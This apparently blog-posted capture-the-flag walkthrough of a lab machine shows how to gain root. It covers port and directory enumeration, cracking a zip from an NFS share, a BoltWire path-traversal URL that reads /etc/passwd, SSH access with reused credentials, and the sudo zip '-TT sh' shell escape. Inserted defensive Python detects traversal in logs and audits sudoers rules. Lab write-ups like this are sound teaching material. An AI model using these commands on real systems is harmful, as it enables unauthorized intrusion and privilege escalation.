This walkthrough will showcase a creative approach to gaining root access on a machine. We'll utilize an unexpected vulnerability within the zip command to escalate privileges.
After successfully setting up your dev machine, use the following details to log in to the machine.
Username: root
Password: tcm
Now we need the IP address of the academy machine. To get it, run the command:
dhclient
and after that run the command:
ip a
From the above image, my IP address for academy is 192.168.59.135
Now we can ping the machine to confirm that both machines are alive and communicating.
For that we use the command:
ping 192.168.59.135 -c3
NB- your IP address will be different from mine, so make sure to note your own IP address and ping that.
The image above shows both machines can communicate as no packets were lost.
Next we run an Nmap scan to search for open ports using the command:
nmap -p- -A 192.168.59.135
From the scan above, 9 ports are open in total, but for this lab our main targets are ports 80, 2049 and 8080.
One of the first things to do after running the scan is to visit the web page on the IP address.
NB- the scan shows two HTTP ports open (80 and 8080), i.e. there are two web pages to visit:
192.168.59.135
and
192.168.59.135:8080
NB- Inputting 192.168.59.135:80 would give you the same result as 192.168.59.135
After looking through both web pages we didn't really find anything there, so next we search for hidden web directories using ffuf.
To do that we open two new tabs and run the commands below, one against each port's web page:
For port 80:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.135/FUZZ
For port 8080:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.135:8080/FUZZ
While the ffuf scans are running, we can open another tab and work on port 2049, which is also open.
Port 2049 is NFS, a network file share, so we are curious whether anything is on the share. To check, we use the command:
showmount -e 192.168.59.135
The output shows a directory called /srv/nfs, which might contain a file.
To get the files from that directory we first create a local directory to mount the share on, and then we mount it.
To create a directory, input the command:
mkdir /mnt/dev
To mount the share, input the command:
mount -t nfs 192.168.59.135:/srv/nfs /mnt/dev
Now we need to enter the /mnt/dev directory using the command:
cd /mnt/dev
and input the command:
ls
You should find only the save.zip file on yours, mine is showing 3 files because I have already unzipped the file.
To unzip the file, we input the command:
unzip save.zip
It asks for a password, which we do not have yet.
There's a tool we can use to try to crack the password of the zip file, called fcrackzip.
To install the tool on your kali, input the command:
apt install fcrackzip
I already have it installed but you might not, so after successful installation input the command:
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip
NB- -v means verbose, because we want to see all the output
-u means use unzip to check each candidate password and weed out false positives
-D means we want to use a dictionary attack
-p gives the wordlist to use as the dictionary (rockyou.txt); the last argument is the file we want to crack, save.zip
After running the command we can see it found the password, which is java101
Now we need to unzip using the password.
Input the command:
unzip save.zip
input java101 for the password
Your file should now have unzipped successfully, and when you input the command ls you should have 3 files as seen below.
There's a txt file and an id_rsa file. First we check what is inside the txt file.
To do that we input the command:
cat todo.txt
We got a message from jp
We don't know who jp is, but we suspect he is a user, and we also have an id_rsa private key, which needs a username before we can SSH in with it.
So we try the command:
ssh -i id_rsa jp@192.168.182.128
NB- If it asks you for a fingerprint input yes
It asks for a password, which we do not know, so sadly we are back to square one.
For now... let's move back and check our web directory search of ffuf.
So for port 80:
The lines not starting with # and with a status of 301 are the directories that were found.
So for port 80 six web directories were found, which are:
- public
- src
- app
- vendor
- extensions
- server-status
and for port 8080:
Two were found, which are:
- dev
- server-status
To check the web directory on 8080 we go to our web browser and input:
http://192.168.182.128:8080/dev
NB- you might have noticed that my machine's IP address has changed; that's because I switched PC, so don't be confused as you follow along.
So we are taken to a boltwire page. I can see a register link on the page, so I ended up registering with the username and password of hacker.
So feel free to register and use any detail of your choice.
Now I move to the port 80 web directories and enter the paths found by ffuf.
After much enumeration, the web directory that stood out for me was the:
http://192.168.182.128/app
Click on the config/ directory found on the web page
Now click on the config.yml file to download the file
After downloading the file, open the file
We find a username of bolt and a password of I_love_java.
So I tried SSH with that username and password and it was still unsuccessful.
So next I went back to the bolt website where I registered as hacker
and searched google for a boltwire exploit.
Found the one below and clicked on the webpage
To use this exploit we need to be authenticated, which we are because we already created the hacker account.
So the next step is to copy the input
index.php?p=action.search&action=../../../../../../../etc/passwd
and enter it in our registered boltwire session.
Our website looked like this
So after copying the details from the exploit page we input it to make it look like this:
So input the command on your webpage:
http://192.168.182.128:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
NB- remember to change the IP address to your machine's IP address.
The machine's users are displayed (the contents of /etc/passwd), and the one which stood out for us was jp.
So jp's username is jeanpaul.
So now we SSH in with the id_rsa key using the command:
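The traversal request above is easy to spot on the server side. As an added defender-side example (not from the original post or from BoltWire), this flags traversal attempts in constructed access-log lines, including URL-encoded ones, and shows the path check a page loader should make before opening a file named by a request parameter:

```python
"""Added example: detect ../ traversal in web-server logs and resolve request-supplied
file names safely. The log lines are constructed for this example, not captured."""
import os
import re
from urllib.parse import unquote

# Constructed sample access-log lines (the first two mimic the request used above).
SAMPLE_LOG = """\
192.168.182.1 - - [10/Jan/2024:10:01:02 +0000] "GET /dev/index.php?p=action.search&action=../../../../../../../etc/passwd HTTP/1.1" 200 1871
192.168.182.1 - - [10/Jan/2024:10:01:05 +0000] "GET /dev/index.php?p=action.search&action=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 200 41
192.168.182.1 - - [10/Jan/2024:10:02:10 +0000] "GET /dev/index.php?p=main HTTP/1.1" 200 5120
192.168.182.1 - - [10/Jan/2024:10:02:11 +0000] "GET /app/config/config.yml HTTP/1.1" 200 733
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
TRAVERSAL_RE = re.compile(r'(?:\.\./|\.\.\\)')
SENSITIVE = ("/etc/passwd", "/etc/shadow", "id_rsa")

def decode_fully(s, rounds=3):
    """URL-decode repeatedly so double-encoded ../ does not slip past the pattern."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def flag_traversal(log_text):
    """Return (line_number, decoded_request) for each request that contains ../
    or names a sensitive file after decoding."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = decode_fully(m.group(1))
        if TRAVERSAL_RE.search(target) or any(s in target for s in SENSITIVE):
            hits.append((n, target))
    return hits

def safe_resolve(base_dir, requested):
    """The check a page loader should make: resolve the requested name under
    base_dir and refuse anything that escapes it. Returns the path or None."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```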
ssh -i id_rsa jeanpaul@192.168.182.128
and for the password I tried using the I_love_java as the password
IT WAS SUCCESSFUL.
So now I input the command:
sudo -l
to find out what sudo privileges we have.
And luckily we find that we can run the zip command as root without having to provide a password.
The next step now is to find out how we can use the zip command we are given to elevate our privilege and become the root user.
For that we google gtfobins.
Click on the webpage found above
Click on sudo from the web page
Scroll down, find zip and click on sudo
It will take you to the page as seen below
Copy the following commands and run them in the terminal logged in as jeanpaul:
TF=$(mktemp -u)
Now input the command:
sudo zip $TF /etc/hosts -T -TT 'sh #'
We have successfully popped a shell.
Now input the command:
whoami
to see which user the shell is running as.
We have successfully become the root user.
Machine successfully exploited!
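The root cause here is a sudoers rule, not zip itself: zip's -TT option lets the caller name the program used to test the archive, so a NOPASSWD rule on zip is effectively a NOPASSWD rule on any command. As an added defender-side example (not from the original post), this audits sudoers-style rules and flags passwordless root entries for binaries that can launch other programs; the sudoers text is constructed for the example, and the SHELL_CAPABLE set holds only zip, the binary shown on this page:

```python
"""Added example: find NOPASSWD sudo rules that hand out root through a binary
that can run other programs (zip via -TT, as used above). Sample input is constructed."""
import os
import re

# Constructed sudoers fragment for this example (not the lab machine's real file).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root     ALL=(ALL:ALL) ALL
jeanpaul ALL=(root) NOPASSWD: /usr/bin/zip
backup   ALL=(root) NOPASSWD: /usr/bin/uptime, /usr/bin/free
dev      ALL=(dev) NOPASSWD: /usr/bin/zip
deploy   ALL=(ALL) /usr/bin/zip
"""

# Binaries that accept a caller-supplied command. Only zip (the case on this page)
# is listed; extend the set from the "sudo" entries on GTFOBins for a real audit.
SHELL_CAPABLE = {"zip"}

# user host=(runas) [TAG:...] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_rules(sudoers_text):
    """Yield one dict per command in each user-specification line."""
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            yield {"who": m.group("who"), "runas": m.group("runas") or "root",
                   "nopasswd": nopasswd, "cmd": cmd, "binary": binary}

def risky_rules(sudoers_text):
    """Rules that let a user run a shell-capable binary as root with no password."""
    return [r for r in parse_rules(sudoers_text)
            if r["nopasswd"] and r["binary"] in SHELL_CAPABLE
            and ("root" in r["runas"] or "ALL" in r["runas"])]
```

The dev and deploy lines are deliberately not flagged: one runs zip only as the dev user, the other still requires a password.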
In conclusion, this walkthrough has demonstrated the potential danger of seemingly insignificant privileges. By exploiting an overpowered zip command, we were able to escalate access from a low-level user to a super user, highlighting the importance of thorough security assessments and the ever-present risk associated with privilege creep.
Top comments (2)
Interesting, keep pushing
Thanks 😊